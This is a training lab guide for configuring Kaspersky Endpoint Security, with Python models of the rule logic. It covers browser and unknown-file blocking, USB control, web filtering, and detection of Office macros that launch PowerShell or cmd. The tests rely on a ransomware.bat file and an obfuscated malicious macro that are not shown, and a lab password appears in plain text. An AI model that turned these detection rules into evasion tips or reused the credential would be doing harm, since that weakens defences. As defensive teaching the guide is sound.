How to configure Application Control
Scenario. You are an administrator at ABC Inc. whose network is protected with Kaspersky Endpoint Security. It is managed
via the Kaspersky Security Center.

According to the corporate security policy, Internet Explorer is the only allowed web browser. All available security updates
are downloaded for it on a regular basis, while the updates of other browsers are not. Considering the fact that malware
typically penetrates a network through browsers today, the decision was made to prohibit all other browsers.

Your task is to enforce the security policy requirements. You need to block all browsers except for Internet Explorer using
Application Control.

Contents. In this lab, we will:

1. Create a category for all web browsers except Internet Explorer
2. Prohibit the users from starting any web browsers except for Internet Explorer
3. Start Mozilla Firefox and Internet Explorer
Task A: Create a category for all web browsers except Internet Explorer

Create an application category that includes all browsers except for Internet Explorer 11.0 or later. To add all browsers, use
Kaspersky Lab (KL) categories. To exclude Internet Explorer, use the metadata of the iexplore.exe file.

The task is performed on Security-Center.


The DC, Security-Center, and Alex-Desktop machines must be powered on.

1. Open Kaspersky Security Center Web Console
2. Open the Operations tab. On the Third-party applications drop-down menu, click Application categories
3. To create a new category, click Add
4. Specify Browsers for the category name
5. For the category creation method, select Category with content added manually
6. Click Next
7. To specify a new condition for the category, click Add
8. Select From KL category
9. Click Next

10. Select the category Browsers | Web Browsers
11. Click Next
12. Click Next
13. Specify exclusions. Click Add
14. On the list of exclusion conditions, choose Hash, metadata, or certificate
15. On the drop-down list, select From file or from MSI package
16. Click Next
17. Click Browse
18. In the window that opens, select the iexplore.exe file from Alex-Desktop (\\Alex-Desktop\c$\Program Files\Internet Explorer\iexplore.exe)
19. Click Next
20. Switch the condition to Metadata
21. In the File version drop-down list, select Greater than or equal to
22. In the Application version drop-down list, select Greater than or equal to
23. Click Next
24. Click OK
25. To confirm creating the Browsers category, click OK

Task B: Prohibit the users from starting any browsers except for Internet Explorer

Open the Application Control settings in the Kaspersky Endpoint Security policy of the Workstations group. Enable
Application Control and select the Block mode instead of Notify.

Add a rule that prohibits starting programs of the Browsers category that you created in the previous task.

The task is performed on Security-Center.


The DC, Security-Center, and Alex-Desktop machines must be powered on.

26. Open Kaspersky Security Center Web Console
27. Go to Devices | Policies & Profiles
28. Open the policy Kaspersky Endpoint Security for Windows (11.1.0)
29. Switch to the Application Settings tab
30. Open the Security Controls section
31. Select the Application Control component
32. Enable the Application Control component
33. Disable the Test Mode
34. Click the link Rules Lists Settings
35. Add a category to the black list. Click Add
36. Click the link Category is not defined
37. Select the Browsers category
38. Click OK
39. Make sure that the Browsers category is blocked for all users
40. Click OK
41. Enable this category if it has not been enabled automatically
42. Click OK
43. Save the policy: Click Save and Yes
44. Wait for the policy to be applied

Task C: Start Mozilla Firefox and Internet Explorer

Make sure that the users are able to launch Internet Explorer but not Mozilla Firefox.

Switch to the Alex-Desktop machine.


The DC, Security-Center, and Tom-Laptop machines must be powered on.

45. Log on to the abc\Alex account, password Ka5per5Ky
46. Run the Mozilla Firefox browser
47. Note that Kaspersky Endpoint Security blocks Firefox and informs the user about it
48. Click OK to close the error message
49. Run the Internet Explorer browser
50. Make sure that Kaspersky Endpoint Security does not block Internet Explorer

Conclusion

If you need to allow or prohibit a group of programs, Kaspersky Lab categories come in very handy. The categories are
updated when database updates are run, and you can feel confident that the latest versions of popular browsers are added and
applied automatically.

When setting up Application Control, remember: Rules configured to deny access will always have a higher priority than ones
that allow access. For this reason, if you need to prohibit a program category except for a few applications, you will need to
create a rule to block access and add exclusions for the allowed applications, which was demonstrated in this lab. Any other
configuration will not work.
Lab 15.
How to block start of unknown applications in the network
Scenario. You are an administrator at ABC Inc. whose network is protected with Kaspersky Endpoint Security. It is managed
via the Kaspersky Security Center. Application Control, as well as Host Intrusion Prevention, can decrease the risk of
becoming infected by new malware. Let us configure Application Control to block the start of all files except trusted ones
within specific operating system directories.

Contents. In this lab, we will:

1. Create an application category that prohibits starting unknown files
2. Change the policy so as to prohibit all users from starting unknown files
3. Make sure that the settings work correctly

Task A: Create an application category that prohibits starting unknown files

In this task, you will create an application category for crypto ransomware.

The task is performed on Security-Center.


The DC, Security-Center, and Alex-Desktop machines must be powered on.

1. Open Kaspersky Security Center Web Console
2. Open the Operations tab. On the Third-party applications drop-down menu, select Application categories
3. Create a new category. Click Add
4. Type Protection Cryptomalware for the category name
5. For the category creation method, select Category with content added manually
6. Click Next

7. To create a condition, click Add
8. Copy the Conditions_Protection_Cryptomalware.txt file to your desktop. Ask the trainer where to find the file
9. Open the file Conditions_Protection_Cryptomalware.txt in Notepad
10. Select Specify path to application (masks supported)
11. Click Next
12. Select and copy the first line from the file Conditions_Protection_Cryptomalware.txt
13. Paste the copied line and click Next
14. Click Add to include the other values
15. In a similar manner, add all other paths from Conditions_Protection_Cryptomalware.txt
16. Click Next
17. Specify exclusions. Click Add
18. Select From KL category
19. Click Next
20. Select all KL categories
21. Click Next
22. Click OK
23. Confirm creating the category. Click OK

Task B: Change the policy so as to prohibit all users from starting unknown files

Open the Application Control settings in the Kaspersky Endpoint Security policy of the Workstations group. Enable
Application Control and select the Block mode instead of Notify.

Add a rule that prohibits starting programs of the Protection Cryptomalware category that you created in the previous task.

The task is performed on Security-Center.


The DC, Tom-Laptop, and Alex-Desktop machines must be powered on.

24. Open Kaspersky Security Center Web Console
25. Go to Devices | Policies & Profiles
26. Open the policy Kaspersky Endpoint Security for Windows (11.1.0)
27. Switch to the Application settings tab
28. Open the Security Controls section
29. Select the Application Control component
30. Click the link Rules Lists Settings
31. Click Add
32. Click the link Category is not defined
33. On the list of categories, select Protection Cryptomalware
34. Click OK
35. Click OK
36. Click OK
37. Click OK
38. Save the policy: Click Save and Yes
39. Wait for the policy to be applied

Task C: Make sure that the settings work correctly

In this task, you will make sure that Kaspersky Endpoint Security blocks start of unknown files.

The task is performed on Alex-Desktop.


The DC, Security-Center, and Tom-Laptop machines must be powered on.

40. Log on to the abc\Alex account, password Ka5per5Ky
41. Double-click ransomware.bat to run it
42. Note that KES blocks ransomware.bat and displays the corresponding notification
43. Click OK to close the error message

Switch to the Security-Center computer.

44. Open Kaspersky Security Center Web Console
45. Go to Devices | Policies & Profiles
46. Open the policy Kaspersky Endpoint Security for Windows (11.1.0)
47. Switch to the Application Settings tab
48. Open the Security Controls section
49. Select the Application Control component
50. Disable the Application Control component
51. Click OK
52. Click Save to save the policy
53. Wait for the policy to be enforced

Conclusion

This lab demonstrates how the administrators, by properly configuring the product, can block the start of new and unknown
files on the endpoints. By doing so, they will limit the likelihood of an infection on the protected machines.
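Lab 14's conclusion states the precedence rule (a deny rule always beats an allow rule, so the way to let a few programs through a blocked category is an exclusion inside the category), and Lab 15 applies the same mechanism with path masks instead of KL categories. The Python below is an added example that models both categories and evaluates the rules a policy would apply; it is not Kaspersky code and does not reproduce the product's matching engine. The KL category names, the masks standing in for Conditions_Protection_Cryptomalware.txt, the file versions and the sample files are constructed; the category structure and the precedence follow the lab text.

```python
"""Evaluate Application Control categories and rules the way Labs 14 and 15 set them up.

Added example, not Kaspersky code. KL category names, the path masks that stand in
for Conditions_Protection_Cryptomalware.txt and the sample files are constructed;
the precedence logic (deny beats allow, exclusions take a file out of a category)
follows the lab text.
"""
from dataclasses import dataclass
from fnmatch import fnmatchcase


@dataclass(frozen=True)
class FileInfo:
    path: str
    file_version: tuple = (0,)
    kl_categories: frozenset = frozenset()  # KL categories the databases assign; empty = unknown file


@dataclass(frozen=True)
class Category:
    name: str
    kl_categories: frozenset = frozenset()  # conditions: "From KL category"
    path_masks: tuple = ()                  # conditions: "Specify path to application (masks supported)"
    excluded_kl: frozenset = frozenset()    # exclusions: "From KL category"
    excluded_files: tuple = ()              # exclusions: (file name, minimum version) from metadata

    def matches(self, f: FileInfo) -> bool:
        path = f.path.lower()
        included = bool(self.kl_categories & f.kl_categories) or any(
            fnmatchcase(path, mask.lower()) for mask in self.path_masks)
        if not included:
            return False
        if self.excluded_kl & f.kl_categories:          # Lab 15: every KL category is an exclusion
            return False
        return not any(path.endswith("\\" + name.lower()) and f.file_version >= min_ver
                       for name, min_ver in self.excluded_files)   # Lab 14: iexplore.exe >= 11.0


@dataclass(frozen=True)
class Rule:
    category: Category
    action: str          # "deny" (black list) or "allow"
    enabled: bool = True


def decide(f, rules, test_mode=False):
    """Deny rules always win over allow rules; a file no enabled rule covers is allowed.
    With Test Mode on (Notify instead of Block) a denial is only reported, not enforced."""
    hits = [r for r in rules if r.enabled and r.category.matches(f)]
    if any(r.action == "deny" for r in hits):
        return "notify" if test_mode else "deny"
    return "allow"


# Constructed KL category names (the real KL catalogue is far larger)
KL_WEB_BROWSERS = "Browsers/Web Browsers"
KL_TEXT_EDITORS = "Office/Text editors"
ALL_KL = frozenset({KL_WEB_BROWSERS, KL_TEXT_EDITORS})

# Lab 14: every KL web browser except iexplore.exe 11.0 or later
BROWSERS = Category("Browsers", kl_categories=frozenset({KL_WEB_BROWSERS}),
                    excluded_files=(("iexplore.exe", (11, 0)),))

# Lab 15: anything started from the masked directories unless it belongs to some KL category.
# The masks are constructed stand-ins for the lab's Conditions_Protection_Cryptomalware.txt.
PROTECTION_CRYPTOMALWARE = Category("Protection Cryptomalware",
                                    path_masks=(r"C:\Users\*\Desktop\*", r"C:\Users\*\AppData\Local\Temp\*"),
                                    excluded_kl=ALL_KL)

RULES = [Rule(BROWSERS, "deny"), Rule(PROTECTION_CRYPTOMALWARE, "deny")]

# Constructed sample files
FIREFOX = FileInfo(r"C:\Program Files\Mozilla Firefox\firefox.exe", (67, 0), frozenset({KL_WEB_BROWSERS}))
IE11 = FileInfo(r"C:\Program Files\Internet Explorer\iexplore.exe", (11, 0), frozenset({KL_WEB_BROWSERS}))
IE10 = FileInfo(r"C:\Program Files\Internet Explorer\iexplore.exe", (10, 0), frozenset({KL_WEB_BROWSERS}))
RANSOMWARE_BAT = FileInfo(r"C:\Users\Alex\Desktop\ransomware.bat")
EDITOR_ON_DESKTOP = FileInfo(r"C:\Users\Alex\Desktop\notepad.exe", (10, 0), frozenset({KL_TEXT_EDITORS}))


if __name__ == "__main__":
    for sample in (FIREFOX, IE11, IE10, RANSOMWARE_BAT, EDITOR_ON_DESKTOP):
        print(f"{decide(sample, RULES):6} {sample.path}")
```

Run as a script it prints the decision for each sample: firefox.exe and an Internet Explorer older than 11.0 are denied, iexplore.exe 11.0 is allowed through the metadata exclusion, the unknown ransomware.bat on the desktop is denied, and a file in a KL category started from the same directory is allowed. The test_mode flag corresponds to leaving Test Mode on (step 33 of Lab 14): the decision is reported but not enforced, which is the setting to use while checking that a new category does not catch legitimate software.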

Lab 16.
How to block USB flash drives
Scenario. You are an administrator at ABC Inc. whose network is protected with Kaspersky Endpoint Security. It is managed
via the Kaspersky Security Center.

Incident analysis has revealed that a number of computers had become infected through USB flash drives. The decision was
made to eliminate this penetration vector. Your task is to block access to all USB flash drives using Kaspersky Endpoint
Security on all workstations in the ABC network.

Contents. In this lab, we will block access to USB flash drives.

Task A: Configure blocking USB flash drives

In this task, we will learn how to configure notifications for terminal users in the policy.
The task is performed on Tom-Laptop.


The DC, Security-Center, and Alex-Desktop machines must be powered on.

1. Log on to the abc\Tom account. Password—Ka5per5Ky
2. Plug the USB flash drive with the course handouts into the host computer
3. On the menu of VMware Workstation, click VM, Removable Devices, <your drive type>, Connect (Disconnect from Host)
4. On the Tom-Laptop computer, click Start, Computer
5. Make sure that the USB flash drive has been connected successfully

Switch to the Security-Center computer.

6. Open Kaspersky Security Center Web Console
7. Go to Devices | Policies & Profiles
8. Open the policy Kaspersky Endpoint Security for Windows (11.1.0)
9. Switch to the Application Settings tab
10. Open the Security Controls section
11. Select the Device Control component

12. Click the link Access rules for devices and Wi-Fi networks
13. Click the link Removable drives
14. Note that access to devices Depends on bus
15. For the Access parameter, select Deny
16. Click OK

17. Make sure that access to Removable drives is set to Deny
18. Click OK
19. Click Save to save the policy
20. Wait for the policy to be enforced

Task B: Test blocking USB flash drives

In this task, we will try to access the device already connected to the computer.

The task is performed on Tom-Laptop.


The DC, Security-Center, and Alex-Desktop machines must be powered on.

21. Log on to the abc\Tom account. Password—Ka5per5Ky

22. Note that the USB flash drive is still shown among Devices and drives
23. Open the USB flash drive
24. Note that despite the fact that the removable drive is visible, it is inaccessible
25. Close the Windows message

26. Click Request access
27. Read the message
28. Click Send

Task C: Receive a request from the user

In this task, we will receive a USB drive access request from the user.

The task is performed on Security-Center.


The DC, Tom-Laptop, and Alex-Desktop machines must be powered on.

29. Open Kaspersky Security Center Web Console
30. Switch to the Monitoring & Reporting | Event Selections tab
31. Select the checkbox next to User requests
32. Click Start

33. Read the request

Conclusion

In this lab, we studied how to block access to removable drives. Aside from blocking access completely, you can also allow
access upon request or allow specific devices only. Typically, administrators will use this functionality to block the spread of
malware through removable drives on the network. This feature can also help to prevent data leakage.

Lab 17.
How to configure granular permissions for USB flash drives
Scenario. You are an administrator at ABC Inc. whose network is protected with Kaspersky Endpoint Security. It is managed
via the Kaspersky Security Center.

You have prohibited access to USB flash drives throughout the company. However, the measure turned out to be too
aggressive, as some users need USB flash drives for work-related tasks. The company has decided to allow all users to use
encrypted USB flash drives.

Now, we will allow the users to read and copy files from USB flash drives; add encrypted USB flash drives to trusted devices
and thus allow domain users to access them without limitations; and also configure logging operations with these USB flash
drives.

Contents. In this lab, we will:

1. Prohibit all users from writing files to USB flash drives
2. Allow the domain users to write files to trusted USB flash drives

Task A: Prohibit all users from writing files to USB flash drives

Open the Device Control settings in the Kaspersky Endpoint Security policy of the Workstations group. Allow the users
(Everyone) to read files from removable drives, but not to write to them.

The task is performed on Tom-Laptop.


The DC, Security-Center, and Alex-Desktop machines must be powered on.

1. Log on to the abc\Tom account. Password: Ka5per5Ky
2. Plug the USB flash drive with the course handouts into the host computer
3. On the menu of VMware Workstation, click VM, Removable Devices, <your drive type>, Connect (Disconnect from Host)
4. On the Tom-Laptop computer, click Start, Computer
5. Make sure that the USB flash drive has been connected successfully

Switch to the Security-Center computer.

6. Open Kaspersky Security Center Web Console
7. Go to Devices | Policies & Profiles
8. Open the policy Kaspersky Endpoint Security for Windows (11.1.0)
9. Switch to the Application Settings tab
10. Open the Security Controls section
11. Select the Device Control component

12. Click the link Access rules for devices and Wi-Fi networks
13. Click the link Removable drives
14. Note that access to devices is set to Deny
15. Prohibit the users from writing to removable drives: Clear the Write check box and click OK
16. Save the policy and wait for it to be enforced

Switch to Tom-Laptop

17. Open the USB flash drive
18. Copy any file from the flash drive to the desktop
19. Try to copy a file from the desktop to the USB flash drive
20. Make sure that Kaspersky Endpoint Security does not permit copying to the flash drive
21. Close the Windows message

Task B: Allow domain users to write files to trusted USB flash drives

Open the Device Control settings in the Kaspersky Endpoint Security policy of the Workstations group. Make the removable
drive trusted for the Domain users group. Select to log events when users write files to USB flash drives.

The task is performed on Security-Center.


The DC, Tom-Laptop, and Alex-Desktop machines must be powered on.

22. Open Kaspersky Security Center Web Console
23. Go to Devices | Policies & Profiles
24. Open the policy Kaspersky Endpoint Security for Windows (11.1.0)
25. Switch to the Application Settings tab
26. Open the Security Controls section
27. Select the Device Control component

28. Click the link Access rules for devices and Wi-Fi networks
29. Click the link Removable drives
30. Open the Logging tab
31. Enable Logging

32. Click the Add button at the bottom of the window to specify a user group
33. Type everyone and click the magnifying glass icon
34. Choose the Everyone group
35. Click Select
36. Click OK

37. Click the link Trusted devices
38. Make the removable drive trusted: Click Add device by ID
39. On the list of devices, select Generic Flash Disk USB Device
40. Click Next
41. Select the Domain Users group
42. Click Next

43. Click OK
44. Make sure that the device has become trusted for the Domain Users group
45. Click OK
46. Switch to the Application Settings tab
47. Open the General Settings section
48. Click Interface
49. In the Notifications area, click the Notification rules link
50. Select the Device Control component
51. Select to Save in local log the File operation performed events and click OK
52. Click Save to save the policy
53. Wait for the policy to be enforced

Switch to Tom-Laptop

54. Copy the invoice.txt file from the desktop to the USB flash drive
55. Make sure that Kaspersky Endpoint Security allows you to write files to a trusted device

Switch to the Security-Center computer.

56. Open Kaspersky Security Center Web Console
57. Switch to Monitoring & Reporting. Open the Reports tab
58. Select the Report on file operations on removable drives
59. Click Show report
60. Switch to the Details tab. Make sure that the report informs that the ABC\Tom user saved the invoice.txt file to a removable drive

Conclusion

In this lab, we studied how to control user access rights to USB flash drives along with making exclusions for specific drive
types. There are always users at a company (secretaries, for example) who need to copy data to/from various USB flash drives
whose model and serial number are usually not known in advance.

Others (like administrators, for example) typically have this information readily available. You can configure exclusions for
these drives. The policy provides for flexible adjustments: You can create a list of specific USB flash drives that are to be
accessible, and specify users and/or groups who use them.
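To make the precedence that Labs 16 and 17 rely on explicit, here is an added Python model of the Device Control decisions those two labs walk through. It is constructed for this guide and is not Kaspersky's own code or its exact evaluation order; it assumes that a Deny rule on removable drives is relaxed only by per-group Read/Write permissions and by trusted devices registered by ID for a user group, that the trusted-device exclusion takes precedence over the bus rule, and that the "File operation performed" event is logged only for writes that were allowed. The "Depends on bus" setting noted in step 14 of Lab 16 is not modelled; the device name and the Tom account come from the labs, while the local account and the second drive ID are constructed.

```python
"""Model of the Device Control decisions exercised in Labs 16 and 17.

Constructed example for this guide, not Kaspersky's implementation.
Assumptions: a Deny rule on removable drives is relaxed only by
per-group Read/Write permissions and by trusted devices (by device ID,
bound to a user group); trusted devices take precedence; the
"File operation performed" event is logged only for allowed writes.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

READ, WRITE = "read", "write"


@dataclass
class RemovableDriveRule:
    access: str                                                     # "Allow" or "Deny"
    permissions: Dict[str, Set[str]] = field(default_factory=dict)  # group -> allowed ops
    log_writes: bool = False                                        # Logging tab (Lab 17, step 31)


@dataclass
class TrustedDevice:
    device_id: str      # "Add device by ID" (Lab 17, step 38)
    groups: Set[str]    # groups the device is trusted for (Lab 17, step 41)


@dataclass
class DeviceControlPolicy:
    removable: RemovableDriveRule
    trusted: List[TrustedDevice] = field(default_factory=list)


def evaluate(policy: DeviceControlPolicy, user_groups: Set[str],
             device_id: str, op: str) -> Tuple[bool, str, bool]:
    """Decide whether `op` on `device_id` is allowed for a member of `user_groups`.

    Returns (allowed, reason, logged); `logged` is True when a
    "File operation performed" event would be recorded for the operation.
    """
    rule = policy.removable
    log = rule.log_writes and op == WRITE

    # Trusted-device exclusions are checked first: the listed groups get
    # full access to that specific device regardless of the bus rule.
    for td in policy.trusted:
        if td.device_id == device_id and td.groups & user_groups:
            return True, "trusted device", log

    if rule.access == "Allow":
        return True, "removable drives: Allow", log

    # Deny: only the operations granted to one of the user's groups pass.
    granted: Set[str] = set()
    for group in user_groups:
        granted |= rule.permissions.get(group, set())
    if op in granted:
        return True, f"removable drives: Deny, {op} granted to group", log
    return False, "removable drives: Deny", False


# The three policy states reached in the labs.
def lab16_policy() -> DeviceControlPolicy:
    return DeviceControlPolicy(RemovableDriveRule(access="Deny"))


def lab17_task_a_policy() -> DeviceControlPolicy:
    # Everyone may read, but the Write box is cleared (Lab 17, step 15).
    return DeviceControlPolicy(
        RemovableDriveRule(access="Deny", permissions={"Everyone": {READ}}))


def lab17_task_b_policy() -> DeviceControlPolicy:
    return DeviceControlPolicy(
        RemovableDriveRule(access="Deny", permissions={"Everyone": {READ}},
                           log_writes=True),
        trusted=[TrustedDevice("Generic Flash Disk USB Device", {"Domain Users"})])


TOM = {"Everyone", "Domain Users"}      # the domain account used in the lab (ABC\Tom)
LOCAL_USER = {"Everyone"}               # a local, non-domain account (constructed)
LAB_DRIVE = "Generic Flash Disk USB Device"
OTHER_DRIVE = "Unknown USB Flash Drive (constructed ID)"


def audit(policy: DeviceControlPolicy) -> List[str]:
    """Run a fixed set of constructed operations and return one line per decision."""
    cases = [
        ("Tom", TOM, LAB_DRIVE, READ),
        ("Tom", TOM, LAB_DRIVE, WRITE),
        ("Tom", TOM, OTHER_DRIVE, WRITE),
        ("local", LOCAL_USER, LAB_DRIVE, WRITE),
    ]
    lines = []
    for who, groups, dev, op in cases:
        allowed, reason, logged = evaluate(policy, groups, dev, op)
        verdict = "allowed" if allowed else "blocked"
        lines.append(f"{who} {op} {dev}: {verdict} ({reason}){' [logged]' if logged else ''}")
    return lines


if __name__ == "__main__":
    for name, pol in [("Lab 16", lab16_policy()),
                      ("Lab 17 A", lab17_task_a_policy()),
                      ("Lab 17 B", lab17_task_b_policy())]:
        print(name)
        for line in audit(pol):
            print("  " + line)
```

Running the script prints the four constructed operations under each of the three policy states; the Lab 17 B block shows why the trusted-device entry is the only way a write reaches the drive, and why a second, unregistered drive or a non-domain account still hits the Deny rule.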

Lab 18.
How to configure web access control
Scenario. You are an antivirus security administrator at ABC Inc. whose network is protected with Kaspersky Endpoint
Security. It is managed via the Kaspersky Security Center. When analyzing the company’s internet traffic, you have found that
many users visit cryptocurrency exchange websites during business hours. Based on this information, you would like to
prohibit that by setting up a policy to specifically block access to the respective content category.

Contents. In this lab, we will block access to cryptocurrency exchange websites.

Task A: Create a rule to block access to cryptocurrency exchange websites

In this task, we will configure the policy to block access to cryptocurrency exchange websites for all users during business
hours.

The task is performed on Security-Center.


The DC, Tom-Laptop, and Alex-Desktop machines must be powered on.

1. Open Kaspersky Security Center Web Console
2. Go to Devices | Policies & Profiles
3. Open the policy Kaspersky Endpoint Security for Windows (11.1.0)
4. Switch to the Application Settings tab
5. Open the Security Controls section
6. Select the Web Control component
7. Click Add

8. In the Rule name field, type Cryptocurrencies
9. For the Action, select Block
10. Select the By content categories checkbox
11. Click the link Content categories
12. On the Content categories list, under Online stores, banks, payment systems, select Cryptocurrencies and mining
13. Click OK
14. Select the option Apply to individual users and / or groups
15. Click Add

16. In the search box, type everyone
17. Choose the respective group
18. Click Select
19. Add scheduling. In the Rule schedule area, click Always
20. Create a new schedule: Click Add
21. Type Business hours for the rule name
22. Configure the schedule so that the rule applies Monday to Friday from 9:00 a.m. to 6:00 p.m.
23. Click OK

24. Select the schedule Business hours
25. Click OK
26. Make sure that the Cryptocurrencies blocking rule has been created
27. Click OK
28. Click Save to save the policy
29. Wait for the policy to be enforced

Task B: Test whether access to cryptocurrency exchange websites is blocked

In this task, we will make sure that the rule is applied, and the Cryptocurrencies and mining category is blocked.

The task is performed on Tom-Laptop.


The DC, Security-Center, and Alex-Desktop machines must be powered on.

30. Log on to the abc\Tom account. Password: Ka5per5Ky
31. Start Internet Explorer
32. Go to www.coinmarketcap.com
33. Make sure that the Cryptocurrencies rule blocks access to the website
34. Close the Internet Explorer window

Task C: Consult reports in Kaspersky Security Center


The task is performed on Security-Center.
The DC, Tom-Laptop, and Alex-Desktop machines must be powered on.

35. Open Kaspersky Security Center Web Console
36. Switch to Monitoring & Reporting | Event Selections
37. Select Recent events
38. Click Start
39. Open the last event from Tom-Laptop
40. Note that Web Control blocked access to website www.coinmarketcap.com

Conclusion

In this lab, we studied the functionality that blocks access to websites. Access can be allowed or blocked by content category,
data type, or both. Access can be blocked during a specified time period only and be applied to user groups or specific users. A
typical use example for this functionality is blocking access to social networks, executable files, or external email, through
which information may leak, and/or infected objects can be downloaded.
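The rule built in this lab combines three conditions: a content category, a user group and a schedule. The following added Python example, written for this guide and not taken from Kaspersky, models that evaluation so the schedule boundaries can be checked. It assumes a small lookup table standing in for Kaspersky's URL category database, top-down rule evaluation where the first match wins, and a half-open schedule window, so 6:00 p.m. itself already falls outside Business hours; the intranet host name and the request timestamps are constructed.

```python
"""Model of a Web Control rule with a content category and a schedule (Lab 18).

Constructed example for this guide, not Kaspersky's implementation.
Assumptions: the website's category comes from a lookup table standing in
for Kaspersky's category database; rules are evaluated top-down and the
first match wins; the schedule window is half-open, so 6:00 p.m. itself is
already outside Business hours.
"""
from dataclasses import dataclass
from datetime import datetime, time
from typing import Dict, List, Optional, Set, Tuple


@dataclass
class Schedule:
    name: str
    weekdays: Set[int]   # Monday == 0 ... Sunday == 6
    start: time
    end: time            # exclusive

    def covers(self, when: datetime) -> bool:
        return when.weekday() in self.weekdays and self.start <= when.time() < self.end


@dataclass
class WebControlRule:
    name: str
    action: str                     # "Block" or "Allow"
    categories: Set[str]            # "By content categories"
    groups: Set[str]                # "Apply to individual users and / or groups"
    schedule: Optional[Schedule]    # None means Always


BUSINESS_HOURS = Schedule("Business hours", {0, 1, 2, 3, 4}, time(9, 0), time(18, 0))

# Stand-in for the category database (constructed; the real categorisation
# is done by Kaspersky's URL classification, not by this table).
SITE_CATEGORIES: Dict[str, Set[str]] = {
    "www.coinmarketcap.com": {"Cryptocurrencies and mining"},
    "intranet.abc.example": set(),
}

LAB18_RULES: List[WebControlRule] = [
    WebControlRule("Cryptocurrencies", "Block",
                   {"Cryptocurrencies and mining"}, {"Everyone"}, BUSINESS_HOURS),
]


def decide(rules: List[WebControlRule], host: str, user_groups: Set[str],
           when: datetime) -> Tuple[str, str]:
    """Return (action, rule_name) for a request; unmatched requests are allowed."""
    categories = SITE_CATEGORIES.get(host, set())
    for rule in rules:
        if not rule.categories & categories:
            continue
        if not rule.groups & user_groups:
            continue
        if rule.schedule is not None and not rule.schedule.covers(when):
            continue
        return rule.action, rule.name
    return "Allow", "no matching rule"


def lab18_checks() -> Dict[str, str]:
    """Constructed requests around the schedule boundaries, with the resulting action."""
    tom = {"Everyone", "Domain Users"}
    probes = {
        "tuesday 10:00": datetime(2019, 6, 4, 10, 0),
        "tuesday 08:59": datetime(2019, 6, 4, 8, 59),
        "tuesday 09:00": datetime(2019, 6, 4, 9, 0),
        "tuesday 18:00": datetime(2019, 6, 4, 18, 0),
        "saturday 10:00": datetime(2019, 6, 8, 10, 0),
    }
    result = {label: decide(LAB18_RULES, "www.coinmarketcap.com", tom, when)[0]
              for label, when in probes.items()}
    result["intranet, tuesday 10:00"] = decide(
        LAB18_RULES, "intranet.abc.example", tom, probes["tuesday 10:00"])[0]
    return result


if __name__ == "__main__":
    for label, action in lab18_checks().items():
        print(f"{label:28} -> {action}")
```

The boundary probes are the part worth keeping when you test a real schedule: a request one minute before the window, exactly at its start, exactly at its end, and on a weekend tell you whether the product treats the end time as inclusive, which this model only assumes.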

Lab 19.
How to configure Adaptive Anomaly Control
Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security
Center. A new component has appeared in the product that permits monitoring scripts and macros and detecting system
anomalies. You have decided to test the health of this protection component. For this purpose, you will use an *.xlsx file with a
macro that contains an obfuscated PowerShell script prepared beforehand.

Contents. In this lab, we will:

1. Configure blocking macros and scripts in office documents
2. Make sure that Adaptive Anomaly Control blocks a malicious macro
3. Configure Exploit prevention to block malicious macros

Task A: Configure blocking macros and scripts in office documents

Disable all main protection components.

By default, the Adaptive Anomaly Control protection component works in the statistics mode at first and collects data about
started programs and scripts. To test how the component detects malicious files, switch it to the block mode manually.

The task is performed on Security-Center.


The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

1. Open Kaspersky Security Center Web Console
2. Go to Devices | Policies & Profiles
3. Open the policy Kaspersky Endpoint Security for Windows (11.1.0)
4. Switch to the Application settings tab
5. Disable Exploit Prevention

6. Select Security Controls
7. Open the settings of the Adaptive Anomaly Control component
8. Click the Rules link to configure detection rules
9. Expand the list of rules Activity of office applications
10. Switch the rules to the block mode: Change the action from Smart to Block for the following rules:
— Start of Microsoft Console Based Script Host from office application
— Start of Microsoft Windows Based Script Host from office application
— Start of Microsoft Windows Command Processor from office application
— Start of Microsoft PowerShell from office application
— Start of embedded file from office application

11. Save the policy: Click OK and Save
12. Confirm that you want to use the specified settings: Click Yes
13. Wait for the policy to be applied

Task B: Make sure that Adaptive Anomaly Control blocks a malicious macro

Send a message with an attachment that contains a malicious script and make sure that the file will be blocked.

The task is performed on Alex-Desktop.


The DC, Security-Center, and Tom-Laptop machines must be powered on.

14. Run Microsoft Outlook
15. Create a new message:
— Specify the addressee. In the To: field, type [email protected]
— In the Subject: box, type Weekly report
— Attach the Weekly_report.xlsm file to the message (ask the trainer where it is located)
16. Dispatch the message: Click Send

Switch to Tom-Laptop

17. Run Microsoft Outlook
18. Open the Weekly report.xlsm attachment

19. In the Microsoft Excel window, click Enable Editing
20. In the Microsoft Excel window, click Enable Content
21. Make sure that a message informing about prohibited PowerShell.exe start has appeared
22. Click OK
23. Make sure that it was Kaspersky Endpoint Security that blocked the action

24. Open the application report
25. Select Adaptive Anomaly Control
26. Find and read the event about a blocked action
27. Close the Microsoft Excel window

Task C: Configure Exploit Prevention to block malicious macros

In the Kaspersky Endpoint Security policy, enable the Exploit Prevention and Behavior Detection components, and change the
Adaptive Anomaly Control rules’ operation mode.

The task is performed on Security-Center.


The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

28. Open Kaspersky Security Center Web Console
29. Go to Devices | Policies & Profiles
30. Open the policy Kaspersky Endpoint Security for Windows (11.1.0)

31. Switch to the Application Settings tab
32. Select Security Controls
33. Open the settings of the Adaptive Anomaly Control component
34. Click the Rules link to configure detection rules
35. Expand the list of rules Activity of office applications
36. Change the action from Block to Smart for the following rules:
— Start of Microsoft Console Based Script Host from office application
— Start of Microsoft Windows Based Script Host from office application
— Start of Microsoft Windows Command Processor from office application
— Start of Microsoft PowerShell from office application
— Start of embedded file from office application

37. Click OK twice



38. In Advanced Threat Protection, select Exploit Prevention
39. Enable the Exploit Prevention component
40. Click OK
41. In a similar manner, enable Behavior Detection
42. Click Save to save the policy
43. Confirm that you want to use the specified settings: Click Yes
44. Wait for the policy to be applied

Switch to Tom-Laptop

45. Open Microsoft Outlook
46. Open the Weekly report.xlsm attachment in Microsoft Excel
47. In the Microsoft Excel window, click Enable Editing
48. In the Microsoft Excel window, click Enable Content

49. Make sure that a message informing about prohibited PowerShell start has appeared
50. Click OK
51. Open Kaspersky Endpoint Security reports
52. Switch to the report of the Exploit Prevention component
53. Make sure that the exploit was detected and blocked
54. Close Microsoft Excel and Microsoft Outlook

Conclusion

You have checked the health of multi-tier protection against malicious macros and scripts embedded in office documents.

You can use each component individually or combine them as necessary to protect workstations.
